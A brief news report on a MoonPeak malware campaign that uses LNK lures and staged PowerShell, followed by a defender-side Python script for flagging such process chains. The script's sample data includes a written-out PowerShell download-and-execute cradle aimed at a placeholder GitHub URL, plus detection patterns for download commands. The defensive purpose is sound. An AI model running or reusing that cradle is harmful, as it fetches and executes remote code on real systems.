Windows systems in South Korea have been compromised with MoonPeak malware in advanced intrusions involving the exploitation of LNK files, according to GBHackers News.

Threat actors have distributed an LNK file purporting to be financial trading guidance. When opened, it displays a decoy PDF to establish legitimacy while stealthily executing an obfuscated PowerShell script, a report from Internet Initiative Japan researchers showed. The initial PowerShell payload checks for virtualization environments and anti-analysis tools as it establishes persistence; a second-stage PowerShell script then retrieves a masked executable from GitHub containing the MoonPeak malware, which decrypts its code dynamically during execution. North Korea-nexus threat actors are believed to be behind the campaign following additional analysis of the GitHub commit email and file naming scheme.

Such a threat should prompt organizations not only to track LNK file execution and whitelist applications, but also to implement PowerShell execution restrictions and robust endpoint detection and response systems.
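As an added defender-side example (not code from the IIJ report or from SC Media), the following Python scorer runs over constructed Sysmon-style process-creation events and flags the chain the article describes: explorer.exe launching a hidden, non-interactive PowerShell with an encoded command that decodes to a download cradle pointing at GitHub. The event values and the repository path are placeholders, not indicators from the campaign.

```python
import base64
import re

def ps_encode(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample events in Sysmon Event ID 1 style; the GitHub path is a placeholder.
STAGE2_CRADLE = ("$u='https://raw.githubusercontent.com/PLACEHOLDER-ORG/PLACEHOLDER-REPO/main/stage2.txt';"
                 "IEX (New-Object Net.WebClient).DownloadString($u)")
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",          # LNK double-click runs under explorer.exe
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -enc " + ps_encode(STAGE2_CRADLE)},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",       # benign admin script for contrast
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"},
]

FLAG_PATTERNS = {  # switches typical of LNK-launched, obfuscated PowerShell
    "hidden window": r"-w(?:indowstyle)?\s+hidden",
    "no profile": r"-no?p(?:rofile)?\b",
    "execution policy bypass": r"-e(?:xecution)?p(?:olicy)?\s+bypass",
    "encoded command": r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}",
}
DOWNLOAD_CRADLE = re.compile(
    r"Invoke-WebRequest|\biwr\b|\birm\b|DownloadString|DownloadFile|Net\.WebClient|"
    r"Invoke-Expression|\bIEX\b|raw\.githubusercontent\.com", re.I)

def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of an -EncodedCommand argument, or '' if there is none."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def analyze_event(ev: dict) -> dict:
    """Score one process-creation event for the LNK -> PowerShell -> download chain."""
    reasons = []
    parent, image, cmd = (ev[k].lower() for k in ("ParentImage", "Image", "CommandLine"))
    if parent.endswith("\\explorer.exe") and image.endswith("\\powershell.exe"):
        reasons.append("powershell.exe spawned by explorer.exe (consistent with a double-clicked LNK)")
    reasons += [name for name, pat in FLAG_PATTERNS.items() if re.search(pat, cmd, re.I)]
    decoded = decode_encoded_command(ev["CommandLine"])  # inspect what the blob actually runs
    hits = sorted({h.lower() for h in DOWNLOAD_CRADLE.findall(cmd + " " + decoded)})
    if hits:
        reasons.append("download cradle: " + ", ".join(hits))
    return {"alert": len(reasons) >= 3, "reasons": reasons, "decoded": decoded}
```

Feed real Sysmon or Security 4688 events through `analyze_event` and route alerts to EDR triage; decoding the blob is what turns a generic "encoded PowerShell" hit into evidence of a second-stage fetch.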